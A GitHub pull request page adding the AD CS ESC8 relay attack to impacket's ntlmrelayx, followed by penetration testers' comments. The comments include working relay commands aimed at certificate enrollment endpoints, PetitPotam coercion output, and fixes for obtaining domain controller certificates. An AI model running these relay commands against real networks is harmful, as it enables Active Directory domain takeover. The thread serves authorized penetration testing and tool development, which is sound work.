Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Implementation of AD CS attack in ntlmrelayx.py #1101

Merged
merged 8 commits into from
Oct 14, 2021

Conversation

ExAndroidDev
Copy link
Contributor

In recently published AD CS research by harmj0y and tifkin_ this misconfiguration is refered as ESC8.

ntlmrelayx-dementor

rubeus

@jeffmcjunkin
Copy link
Contributor

I felt a great disturbance in the Force Blue Team, as if millions of voices suddenly cried out in terror and were suddenly silenced exploited. I fear something terrible has happened.

@fsacer
Copy link

fsacer commented Jun 29, 2021

well this worked for me 👍

@pantsman0
Copy link

Seconding @fsacer. This worked for me on a penetration test. I had some issues with Rubeus, but the ADCS attack worked fine.

I think a good extension of this would be to add the -i flag, as the change doesn't keep track of successfully exploited users.
This leads to multiple certificates being issued for users with multiple authentication attempts.

Apart from log-spam/opsec, this is a remediation papercut for penetration test customers.

@okiwoki
Copy link

okiwoki commented Jul 27, 2021

Seconding @fsacer. This worked for me on a penetration test. I had some issues with Rubeus, but the ADCS attack worked fine.

I think a good extension of this would be to add the -i flag, as the change doesn't keep track of successfully exploited users.
This leads to multiple certificates being issued for users with multiple authentication attempts.

Apart from log-spam/opsec, this is a remediation papercut for penetration test customers.

What issue did you have on Rubeus? I'm running into several issues like error 75 (KDC_ERR_CLIENT_NAME_MISMATCH) or 16 (KDC_ERR_PADATA_TYPE_NOSUPP)

@pantsman0
Copy link

I was having KRB error 62 (KDC_ERR_CLIENT_NOT_TRUSTED) when trying to asktgt with the certificate as auth.

@snovvcrash
Copy link
Contributor

snovvcrash commented Jul 27, 2021

What issue did you have on Rubeus? I'm running into several issues like error 75 (KDC_ERR_CLIENT_NAME_MISMATCH) or 16 (KDC_ERR_PADATA_TYPE_NOSUPP)

Same here. Facing the KDC_ERR_CLIENT_NAME_MISMATCH (75) error as well.

UPD. It appears that the KDC_ERR_CLIENT_NAME_MISMATCH error happens when there's no SAN defined for a certificate template, i.e. all of the boxes in the red area are unchecked (or if the HKLM\SYSTEM\CurrentControlSet\Services\Kdc\UseSubjectAltName setting equals DWORD 0 on all the DCs as stated in the original research, page 111):

1

As for the KDC_ERR_CLIENT_NOT_TRUSTED error, see this tweet @pantsman0

@kapshure
Copy link

kapshure commented Jul 28, 2021

anyone ran into this error message?

AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

got that after running:

python3 ntlmrelayx.py -t http://ca01.domain.com/certsrv/certfnsh.asp -smb2support --adcs

@czz1233
Copy link

czz1233 commented Jul 29, 2021

有人遇到过这个错误信息吗?

me too

@pantsman0
Copy link

anyone ran into this error message?

AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

got that after running:

python3 ntlmrelayx.py -t http://ca01.domain.com/certsrv/certfnsh.asp -smb2support --adcs

Make sure you've installed the patched impacket library from this commit or the fork.

@RapidWolf95
Copy link

anyone ran into this error message?

AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

got that after running:

python3 ntlmrelayx.py -t http://ca01.domain.com/certsrv/certfnsh.asp -smb2support --adcs

I'm running into the same issue. Here is what I ran to clone the master branch of impacket and check out the pull request from exandroiddev:

git clone https://github.com/SecureAuthCorp/impacket ./impacket
cd impacket
git fetch origin pull/1101/head:ntlmrelayx-adcs-attack
git checkout ntlmrelayx-adcs-attack
cd examples
python3 ntlmrelayx.py -t http://my.victim.host/certsrv/certfnsh.asp -smb2support --adcs

The output I get is:

Impacket v0.9.24.dev1+20210630.100536.73b9466c - Copyright 2021 SecureAuth Corporation

[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
Traceback (most recent call last):
  File "/home/twilson/resources/linux/impacket-adcs/examples/ntlmrelayx.py", line 404, in <module>
    c = start_servers(options, threads)
  File "/home/twilson/resources/linux/impacket-adcs/examples/ntlmrelayx.py", line 167, in start_servers
    c.setIsADCSAttack(options.adcs)
AttributeError: 'NTLMRelayxConfig' object has no attribute 'setIsADCSAttack'

I see that pantsman0 has mentioned:

Make sure you've installed the patched impacket library from this commit or the fork.

Which I thought is what I was doing by cloning the master branch from impacket, but obviously I'm missing something.

Posting something here in case anyone else ran into the same issue and figured it out so everyone can learn from it.

@pantsman0
Copy link

@RapidWolf95 @kapshure to install the modified impacket library, you can use the following command from the root of the repository
python setup.py install

If you don't want to overwrite your system install, I would suggest setting up a virtual environment first. If you have virtualenv, you can do so with this command:
virtualenv -p python3 .

The virtual environment can then be activated each time you need to use this library version by running
source ./bin/activate

@RapidWolf95
Copy link

@RapidWolf95 @kapshure to install the modified impacket library, you can use the following command from the root of the repository
python setup.py install

If you don't want to overwrite your system install, I would suggest setting up a virtual environment first. If you have virtualenv, you can do so with this command:
virtualenv -p python3 .

The virtual environment can then be activated each time you need to use this library version by running
source ./bin/activate

Thanks @pantsman0! I feel silly now, but that was exactly it. I was trying not to overwrite the system install and somehow didn't even consider that as part of the issue.
Appreciate the help! It's working now!

@octopodpotato
Copy link

octopodpotato commented Aug 8, 2021

Does anyone recognize what is going wrong?
sudo python3 ./examples/ntlmrelayx.py -debug -smb2support --target http://**/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

[] HTTP server returned error code 200, treating as a successful login
[
] Authenticating against ** as ** SUCCEED
[] Generating CSR...
[
] CSR generated!
[] Getting certificate...
[
] Error obtaining certificate!

meanwhile petitpotam:

[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
Something went wrong, check error status => The NETBIOS connection with the remote host timed out.

@robvinson
Copy link

Tried with PetitPotam; this can result in many certs being created for the same user. It'd be nice if it would track the user so that multiple certs aren't issued for the same user, or if there was a one-shot mode. Along the same vein it'd be convenient to have the certificate fingerprint printed out to grease the way to cleanup issued certs. Perhaps persnickety...

@pantsman0
Copy link

pantsman0 commented Aug 14, 2021

Tried with PetitPotam; this can result in many certs being created for the same user. It'd be nice if it would track the user so that multiple certs aren't issued for the same user, or if there was a one-shot mode.]

This would be a good option, reponder tracks user hashes and doesn't print out hashes for duplicate users. Something to prevent a certificate request for a previously successful user would be great utility, good opsec, and and make defender cleanup easier.

Along the same vein it'd be convenient to have the certificate fingerprint printed out to grease the way to cleanup issued certs. Perhaps persnickety...

If you have the certificates in files, you can do something like this:

# for f in *.pem; do openssl x509 -inform pem -in $f -noout -fingerprint SHA1; done

Fix when cert server does not request NTLM auth
@ExAndroidDev
Copy link
Contributor Author

Tried with PetitPotam; this can result in many certs being created for the same user. It'd be nice if it would track the user so that multiple certs aren't issued for the same user, or if there was a one-shot mode. Along the same vein it'd be convenient to have the certificate fingerprint printed out to grease the way to cleanup issued certs. Perhaps persnickety...

This has been implemented now. Thanks @Tw1sm .

@S3cur3Th1sSh1t
Copy link
Contributor

I had an ADCS endpoint now who didn't accept NTLM auth but asked for Netotiate:

NTLM Auth not offered by URL, offered protocols: Negotiate

Is there a plan to support Negotiate auth in the future? Is it even possible to relay that?

Greetings

@mpgn
Copy link
Contributor

mpgn commented Sep 20, 2021

Test with this PR #1146 @S3cur3Th1sSh1t

@S3cur3Th1sSh1t
Copy link
Contributor

@mpgn worked fine, thanks for the hint! :-)

@frisch-raphael
Copy link

frisch-raphael commented Sep 30, 2021

Hi,

I've been trying this pull request on a test lab, but while the petitpotam part seems to work, the authentification to the target DC is failing.

python3 PetitPotam.py 192.168.1.38 192.168.1.100   

[-] Connecting to ncacn_np:192.168.1.100[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
python3 ./examples/ntlmrelayx.py -debug -t http://192.168.1.100/certsrv/certfnsh.asp -smb2support --adcs
Impacket v0.9.24.dev1+20210930.62146.668ca3ca - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /opt/impacket/lib/python3.9/site-packages/impacket-0.9.24.dev1+20210930.62146.668ca3ca-py3.9.egg/impacket
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server

[*] Servers started, waiting for connections
^[[A[*] SMBD-Thread-4: Connection from ETHICALHACKERS/DOMAIN-CONTROLL$@192.168.1.100 controlled, attacking target http://192.168.1.100
[-] Authenticating against http://192.168.1.100 as ETHICALHACKERS/DOMAIN-CONTROLL$ FAILED

While looking at the resulting pcap, we can see that the relayed authentication gets a 401.

image

Here's the full pcap:

ntlmx_adcs_authent_failing.zip

Any idea on what could be wrong / how to debug more thoroughly ? May be it's a case where you can't relay an authentication to itself ?

@Tw1sm
Copy link
Contributor

Tw1sm commented Sep 30, 2021

@frisch-raphael Haven't looked at the pcap but my initial thought is that I don't believe you can relay auth back to the machine you coerced it from. I'd try PetitPotam against a different DC or a workstation.

@mpgn
Copy link
Contributor

mpgn commented Sep 30, 2021

Probably the wrong template, try "DomainController"

@aconite33
Copy link
Contributor

Does anyone recognize what is going wrong? sudo python3 ./examples/ntlmrelayx.py -debug -smb2support --target http://**/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

[] HTTP server returned error code 200, treating as a successful login [] Authenticating against ** as ** SUCCEED [] Generating CSR... [] CSR generated! [] Getting certificate... [] Error obtaining certificate!

meanwhile petitpotam:

[+] Connected! [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e [+] Successfully bound! [-] Sending EfsRpcOpenFileRaw! Something went wrong, check error status => The NETBIOS connection with the remote host timed out.

@octopodpotato Did you ever find a resolution to this? I'm encountering the same problem and even with -debug flag I can't get the reason why it's failing. I'm able to invoke a response from a DC$ but it errors out here.

@S3cur3Th1sSh1t
Copy link
Contributor

The easiest way to find out the issue is printing the Webserver responses from my point of view.

That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

@aconite33
Copy link
Contributor

The easiest way to find out the issue is printing the Webserver responses from my point of view.

That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

How were you capturing the responses? I'm not seeing an option in ntlmrelayx, outside of the -debug which wasn't showing anything except just limited information. Were you capturing with a pcap or did you modify ntlmrelayx to be a bit more verbose?

@frisch-raphael
Copy link

@frisch-raphael Haven't looked at the pcap but my initial thought is that I don't believe you can relay auth back to the machine you coerced it from. I'd try PetitPotam against a different DC or a workstation.

You were right. I sat up a separate CA and it seems to work better.

@S3cur3Th1sSh1t
Copy link
Contributor

The easiest way to find out the issue is printing the Webserver responses from my point of view.
That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

How were you capturing the responses? I'm not seeing an option in ntlmrelayx, outside of the -debug which wasn't showing anything except just limited information. Were you capturing with a pcap or did you modify ntlmrelayx to be a bit more verbose?

Edit the source code and add a print statement for the response 😉

@aconite33
Copy link
Contributor

The easiest way to find out the issue is printing the Webserver responses from my point of view.
That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

How were you capturing the responses? I'm not seeing an option in ntlmrelayx, outside of the -debug which wasn't showing anything except just limited information. Were you capturing with a pcap or did you modify ntlmrelayx to be a bit more verbose?

Edit the source code and add a print statement for the response 😉

I figured as much. I was in the middle of an assessment and didn't have time to go deep. Figured out my issue by using the Kerberos authentication template. But yeah I will take a look and maybe make a verbose output if the debug flag is on.

@0xdeaddood 0xdeaddood added the in review This issue or pull request is being analyzed label Oct 7, 2021
@0xdeaddood
Copy link
Collaborator

Hi @ExAndroidDev!

This is an amazing addition! Just one thing before merging, could you refactor the httpattack.py code in order to create submodules with the different HTTP attacks? In this case, we'll have a submodule HTTPattack with the adcsrelayattack. It's something similar to what is proposed in #1173 with the different rpc attacks. What do you think?

Thanks!!!

@0xdeaddood 0xdeaddood added the waiting for response Further information is needed from people who opened the issue or pull request label Oct 12, 2021
@ExAndroidDev
Copy link
Contributor Author

Hi @0xdeaddood ,
Sorry for the late response, I somehow missed your comment.
It sounds good to me. I will start working on it.

@pantsman0
Copy link

Another idea that I've been thinking about it supporting the -i option that SMB and LDAP attacks support.
It would be great if we could just relay credentials to get an active HTTP connection that is kept alive - and then a telnet shell that allows other functions that we may want in that context ( e.g. I think you can list allowed certificate templates from certrqus.asp), or event just try multiple templates without needing to re-invoke smbrelayx.

I've been looking at working on this on my own time, but my work situation means I can't devote serious time to it until December. I thought I would put it out there in case anyone else is interested in working on these features.

@ExAndroidDev
Copy link
Contributor Author

Hey @pantsman0 , great idea, but unfortunately I am also short on time.

Hey @0xdeaddood , I have just refactored the code. Please let me know what you think. Thanks!

@0xdeaddood
Copy link
Collaborator

Thanks a lot, @ExAndroidDev! Merging...

@0xdeaddood 0xdeaddood merged commit 3ff7e6f into fortra:master Oct 14, 2021
@0xdeaddood 0xdeaddood removed waiting for response Further information is needed from people who opened the issue or pull request in review This issue or pull request is being analyzed labels Oct 14, 2021
@Cyb3rC3lt
Copy link
Contributor

The easiest way to find out the issue is printing the Webserver responses from my point of view.

That helped me by troubleshooting. The ADCS server answers with clear error messages like ‘Template not found’ or others.

Any chance you could point out where and what changes they were please? I'm no python expert unfortunately. Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.